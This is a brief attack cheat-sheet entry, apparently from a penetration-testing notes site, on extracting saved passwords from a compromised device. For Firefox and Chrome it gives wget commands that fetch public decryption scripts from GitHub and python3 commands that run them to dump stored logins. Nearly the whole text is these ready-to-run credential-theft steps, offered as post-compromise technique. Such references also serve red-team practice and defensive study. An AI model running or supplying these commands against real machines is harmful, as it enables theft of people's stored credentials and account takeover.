Extract Web Browser Passwords

Last modified: 2023-06-23

Web

Browser’s passwords may be retrieve easily if our device is compromised by decrypting login data.

Firefox

wget https://raw.githubusercontent.com/unode/firefox_decrypt/main/firefox_decrypt.py
python3 firefox_decrypt.py

Google Chrome

wget https://raw.githubusercontent.com/ohyicong/decrypt-chrome-passwords/main/decrypt_chrome_password.py
python3 decrypt_chrome_password.py